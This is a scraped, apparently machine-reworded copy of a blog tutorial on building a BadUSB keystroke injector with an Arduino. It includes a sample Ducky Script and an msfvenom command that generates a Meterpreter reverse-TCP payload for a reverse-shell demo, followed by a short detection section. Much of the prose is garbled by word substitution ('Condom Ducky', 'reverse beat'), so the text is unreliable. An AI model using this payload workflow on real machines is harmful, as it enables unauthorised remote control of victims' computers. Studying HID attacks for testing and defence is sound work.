banner



How To Register The Windows Button On Rubber Ducky

Pwn3d In Seconds — Attack of the Safety Duck

In this weblog, we'll be looking at the USB Prophylactic Ducky or the BadUSB. We'll kickoff past an introduction to BadUSBs, what makes USBs "Bad" and and so we'll expect at creating our own BadUSB.

What is a USB Rubber Ducky (or BadUSB)?

USB Rubber Ducky (famously seen in the Mr. Robot TV series) is not a traditional USB drive. In fact, a USB Rubber Ducky (or BadUSB, in general) is a keystrokes injector, which acts as an HID (Human Interface Device) when plugged into a reckoner, and mimics one. Originally adult by HAK5, it is a handy little tool for hackers and pentesters assuasive them to go a vanquish, run arbitrary code etc. on the target computer.

What makes a USB "BAD"?

Have you always plugged in a USB mouse or a keyboard and got a prompt for allowing access? No, right. Well, this is what makes BadUSBs useful. Equally mentioned earlier, BadUSBs register themselves as an HID, let's say a keyboard, and then functions in the exact aforementioned way as a keyboard does, only deviation being that with a keyboard y'all have to type in commands yourself, whereas the BadUSB runs an automation script typing in the keystrokes for at a very loftier speed.

This automation script, dubbed equally a Ducky Script, is simply a ready of commands or an instruction guide for the USB Rubber Ducky.

Ducky Scripts

A Ducky Script is an educational activity guide for the BadUSB. It mimics a keyboard, typing in keystrokes to run various commands on the target computer.

Let's say for example, we have to create a Ducky Script that opens upward the control prompt and runs the ping command. On a normal keyboard, the steps would be:

  1. Press the windows logo + r, to open up up the Run dialogue box
  2. Type cmd and press enter
  3. Blazon your command and press enter, in case of above case: <ping -n 2 10.10.x.10>

The Ducky Script for the above procedure would be:

          REM Ducky Script to Ping a Organization → comment          DELAY 1000 → 1 second delay earlier the next command          GUI r → windows cardinal + r → to open up the Run dialogue box          Cord cmd → type cmd          ENTER          DELAY 2000 → a delay of two seconds for the control prompt to open up          STRING ping -n ii 10.10.10.10 → type the ping control          ENTER          DELAY 3000 → delay of 3 seconds for the ping command to complete          STRING exit → type leave          ENTER → go out out of the control prompt        

What can exist achieved using USB Condom Ducky or BadUSB?

Anything that you lot tin exercise with a command shell, can exist washed using a BadUSB. For example, getting a reverse beat, bypassing end-signal protection, downloading and installing malware from a malicious webserver, downloading a sensitive file from the target organization and then on. Pre-written Ducky Script payloads are available on this link.

Creating your own USB Rubber Ducky

In lodge to create our own USB Rubber Ducky, nosotros'll be using Arduino. For this, we'll be using an Arduino Leonardo (or whatever Arduino will work that supports USB read/write). Apart from this, we'll exist needing an Arduino IDE and a tool to convert our Ducky Scripts into an Arduino understandable code (or yous tin write your own Arduino code, it's fairly simple too) .

Creating a USB Condom Ducky from Arduino is extremely simple.

After writing your Ducky Script (or getting one of the pre-written scripts), use the Duckuino to convert the Ducky Script into Arduino understandable code.

Open up upwardly Arduino IDE and from Tools > Board > and select your Arduino board.

And then from Tools > Port > select the port on which the Arduino is connected.

Open up a New Project, paste in your Arduino converted Ducky Script, so from Sketch > select Verify/Compile or press CTRL+R.

Later on the compilation is done, from Sketch > select Upload or press CTRL+U to upload the code to the Arduino.

The USB Condom Ducky is prepare to utilize. Disconnect the Arduino and connect information technology again to run across it working.

Practical Sit-in

Lab Setup:

Target : Windows 10 (AV enabled for the kickoff demo, to show the bear upon, just then disabled to prove the execution of malware)

Let's sentinel our USB Safe Ducky created with Arduino in activity.

Demo # 1:

For the sake of demonstration, my Ducky Script will open up the notepad and display a type in some random text.

Demo # 2:

Now let's try and become a reverse shell of the target machine.

Modifying our Ducky Script so that information technology downloads our malware onto the target car, and executes it giving us a reverse trounce of the target.

The malware was created using msfvenom, with the following control:

          $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -f exe > game.exe        

A webserver is running on port 80, and so that our BadUSB may easily download the malware.

Detection

While detection and mitigation against HID attacks is extremely difficult, a couple of tools listed below tin exist used to monitor USB upshot logs and keystrokes, and yous can look for events showing that a keyboard was plugged in and within seconds a powershell control was executed (or command prompt was accessed). But again, it all comes downward to this: "Don't plug in a random, strange USB into your computer/network."

  • Using a tool like DuckHunter, that catches Rubber Duck attacks by looking for keystrokes that are typed at very fast speeds.
  • Using a tool like usbrip, that can display all USB log events (only for linux systems)

References

  • https://github.com/hak5darren/USB-Prophylactic-Ducky/wiki/Payloads
  • https://dukweeno.github.io/Duckuino/
  • https://www.arduino.cc/en/software/
  • Buy the Original USB Rubber Ducky from the HAK5 Shop

How To Register The Windows Button On Rubber Ducky,

Source: https://systemweakness.com/pwn3d-in-seconds-attack-of-the-rubber-duck-26f9ae1d08b0

Posted by: sullivanyessund82.blogspot.com

0 Response to "How To Register The Windows Button On Rubber Ducky"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel